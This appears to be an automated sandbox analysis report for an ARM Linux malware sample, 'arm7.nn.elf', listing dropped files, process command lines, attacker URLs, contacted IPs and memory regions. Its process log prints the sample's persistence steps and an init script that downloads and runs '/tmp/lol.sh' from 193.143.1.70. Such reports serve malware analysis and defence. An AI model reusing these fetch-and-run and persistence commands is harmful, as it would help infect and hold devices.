Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
arm7.nn.elf
|
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
|
initial sample
|
||
/etc/init.d/arm7.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/etc/profile
|
ASCII text
|
dropped
|
||
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/boot/bootcmd
|
ASCII text
|
dropped
|
||
/etc/inittab
|
ASCII text
|
dropped
|
||
/etc/motd
|
ASCII text
|
dropped
|
||
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
/tmp/qemu-open.GXEQs8 (deleted)
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
/tmp/arm7.nn.elf
|
/tmp/arm7.nn.elf
|
||
/tmp/arm7.nn.elf
|
-
|
||
/tmp/arm7.nn.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
/tmp/arm7.nn.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
/tmp/arm7.nn.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
/tmp/arm7.nn.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm7.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm7.nn.elf'\n
/tmp/arm7.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n
echo 'Stopping arm7.nn.elf'\n killall arm7.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo
\\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm7.nn.elf"
|
||
/tmp/arm7.nn.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "chmod +x /etc/init.d/arm7.nn.elf >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /etc/init.d/arm7.nn.elf
|
||
/tmp/arm7.nn.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
/tmp/arm7.nn.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/ln
|
ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf
|
||
/tmp/arm7.nn.elf
|
-
|
||
/tmp/arm7.nn.elf
|
-
|
||
/tmp/arm7.nn.elf
|
-
|
||
/tmp/arm7.nn.elf
|
-
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 41 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
http://193.143.1.70/curl.sh
|
unknown
|
||
http://193.143.1.70/lol.sh
|
unknown
|
||
http://193.143.1.70/
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
108.218.207.151
|
unknown
|
United States
|
||
44.41.0.148
|
unknown
|
United States
|
||
222.97.59.78
|
unknown
|
Korea Republic of
|
||
186.140.29.220
|
unknown
|
Argentina
|
||
49.164.163.139
|
unknown
|
Korea Republic of
|
||
83.93.226.228
|
unknown
|
Denmark
|
||
141.134.222.109
|
unknown
|
Belgium
|
||
113.155.105.170
|
unknown
|
Japan
|
||
59.165.85.60
|
unknown
|
India
|
||
184.14.85.135
|
unknown
|
United States
|
||
73.57.31.40
|
unknown
|
United States
|
||
189.14.240.153
|
unknown
|
Brazil
|
||
29.55.170.110
|
unknown
|
United States
|
||
35.6.89.70
|
unknown
|
United States
|
||
90.169.71.146
|
unknown
|
Spain
|
||
215.110.139.87
|
unknown
|
United States
|
||
88.227.142.200
|
unknown
|
Turkey
|
||
78.69.71.77
|
unknown
|
Sweden
|
||
44.116.143.183
|
unknown
|
United States
|
||
163.125.198.12
|
unknown
|
China
|
||
149.18.139.110
|
unknown
|
United States
|
||
75.140.161.71
|
unknown
|
United States
|
||
148.176.149.205
|
unknown
|
United Kingdom
|
||
64.56.157.203
|
unknown
|
Canada
|
||
210.195.66.18
|
unknown
|
Malaysia
|
||
146.187.189.126
|
unknown
|
United States
|
||
169.91.187.169
|
unknown
|
United States
|
||
12.124.237.61
|
unknown
|
United States
|
||
45.154.146.255
|
unknown
|
Poland
|
||
86.107.89.70
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
31.232.159.158
|
unknown
|
Germany
|
||
150.98.116.172
|
unknown
|
Japan
|
||
177.172.95.39
|
unknown
|
Brazil
|
||
29.7.196.37
|
unknown
|
United States
|
||
39.160.134.110
|
unknown
|
China
|
||
166.74.224.28
|
unknown
|
United States
|
||
72.128.228.16
|
unknown
|
United States
|
||
121.51.22.126
|
unknown
|
China
|
||
18.53.18.246
|
unknown
|
United States
|
||
16.74.158.242
|
unknown
|
United States
|
||
189.46.170.0
|
unknown
|
Brazil
|
||
45.201.230.233
|
unknown
|
Seychelles
|
||
176.196.182.56
|
unknown
|
Russian Federation
|
||
49.167.178.230
|
unknown
|
Korea Republic of
|
||
79.174.130.81
|
unknown
|
Belgium
|
||
83.90.31.246
|
unknown
|
Denmark
|
||
12.189.29.20
|
unknown
|
United States
|
||
9.15.165.84
|
unknown
|
United States
|
||
30.83.90.10
|
unknown
|
United States
|
||
143.78.213.0
|
unknown
|
United States
|
||
97.80.59.174
|
unknown
|
United States
|
||
33.219.71.153
|
unknown
|
United States
|
||
36.211.231.93
|
unknown
|
China
|
||
111.243.14.173
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
18.44.62.71
|
unknown
|
United States
|
||
176.99.225.31
|
unknown
|
Russian Federation
|
||
62.137.199.53
|
unknown
|
United Kingdom
|
||
45.182.36.35
|
unknown
|
Peru
|
||
35.74.17.116
|
unknown
|
United States
|
||
157.171.213.243
|
unknown
|
Sweden
|
||
120.163.221.201
|
unknown
|
Indonesia
|
||
173.56.204.138
|
unknown
|
United States
|
||
31.45.136.185
|
unknown
|
Croatia (LOCAL Name: Hrvatska)
|
||
197.38.183.244
|
unknown
|
Egypt
|
||
124.34.119.210
|
unknown
|
Japan
|
||
102.49.136.243
|
unknown
|
Morocco
|
||
46.111.15.136
|
unknown
|
Russian Federation
|
||
174.100.61.50
|
unknown
|
United States
|
||
189.252.227.94
|
unknown
|
Mexico
|
||
125.44.4.180
|
unknown
|
China
|
||
116.116.247.112
|
unknown
|
China
|
||
222.174.101.115
|
unknown
|
China
|
||
5.4.88.82
|
unknown
|
Germany
|
||
67.69.177.81
|
unknown
|
Canada
|
||
191.105.49.234
|
unknown
|
Colombia
|
||
193.143.1.70
|
unknown
|
unknown
|
||
186.124.159.227
|
unknown
|
Argentina
|
||
134.49.197.113
|
unknown
|
United States
|
||
119.149.21.179
|
unknown
|
Korea Republic of
|
||
64.88.94.246
|
unknown
|
United States
|
||
132.157.107.251
|
unknown
|
Peru
|
||
76.68.94.133
|
unknown
|
Canada
|
||
43.124.232.40
|
unknown
|
Japan
|
||
146.114.152.212
|
unknown
|
United States
|
||
141.14.92.147
|
unknown
|
Germany
|
||
158.237.109.21
|
unknown
|
United States
|
||
34.86.59.93
|
unknown
|
United States
|
||
208.164.10.187
|
unknown
|
United States
|
||
83.153.84.47
|
unknown
|
France
|
||
123.1.173.144
|
unknown
|
Hong Kong
|
||
103.19.149.151
|
unknown
|
India
|
||
86.53.156.155
|
unknown
|
United Kingdom
|
||
93.250.227.66
|
unknown
|
Germany
|
||
189.198.194.140
|
unknown
|
Mexico
|
||
45.102.167.242
|
unknown
|
Egypt
|
||
139.226.193.112
|
unknown
|
China
|
||
59.30.171.138
|
unknown
|
Korea Republic of
|
||
88.40.94.232
|
unknown
|
Italy
|
||
217.121.159.164
|
unknown
|
Netherlands
|
||
65.33.134.243
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7f5730037000
|
page execute read
|
|||
7f5730037000
|
page execute read
|
|||
7f573003f000
|
page read and write
|
|||
7f5838c9b000
|
page read and write
|
|||
7f583905e000
|
page read and write
|
|||
562bb6e3f000
|
page read and write
|
|||
7f58391f0000
|
page read and write
|
|||
7f58391f0000
|
page read and write
|
|||
562bb6be5000
|
page execute read
|
|||
7f58391ab000
|
page read and write
|
|||
562bb6be5000
|
page execute read
|
|||
7f5838e7d000
|
page read and write
|
|||
7f58388a1000
|
page read and write
|
|||
7f5730049000
|
page read and write
|
|||
562bb9c7c000
|
page read and write
|
|||
7ffca5c4b000
|
page execute read
|
|||
562bb6e36000
|
page read and write
|
|||
7f5838b0c000
|
page read and write
|
|||
7f58384ad000
|
page read and write
|
|||
7f5837ca5000
|
page read and write
|
|||
562bb8e3d000
|
page execute and read and write
|
|||
7f5837ca5000
|
page read and write
|
|||
562bb6e36000
|
page read and write
|
|||
7f5838e7d000
|
page read and write
|
|||
562bb6e3f000
|
page read and write
|
|||
7f58384ad000
|
page read and write
|
|||
7f583853f000
|
page read and write
|
|||
7ffca5bfd000
|
page read and write
|
|||
7f5839187000
|
page read and write
|
|||
7f582ffff000
|
page read and write
|
|||
7f5730044000
|
page read and write
|
|||
7f583853f000
|
page read and write
|
|||
7f5730044000
|
page read and write
|
|||
7f5838b2f000
|
page read and write
|
|||
7f583905e000
|
page read and write
|
|||
562bb8e3d000
|
page execute and read and write
|
|||
7ffca5bfd000
|
page read and write
|
|||
7f5839187000
|
page read and write
|
|||
7f5830021000
|
page read and write
|
|||
7ffca5c4b000
|
page execute read
|
|||
7f5838b0c000
|
page read and write
|
|||
7f5838c9b000
|
page read and write
|
|||
562bb9c7c000
|
page read and write
|
|||
7f582ffff000
|
page read and write
|
|||
562bb8e54000
|
page read and write
|
|||
562bb8e54000
|
page read and write
|
|||
7f5830021000
|
page read and write
|
|||
7f5838b2f000
|
page read and write
|
|||
7f58388a1000
|
page read and write
|
|||
7f58391ab000
|
page read and write
|
|||
7f573003f000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.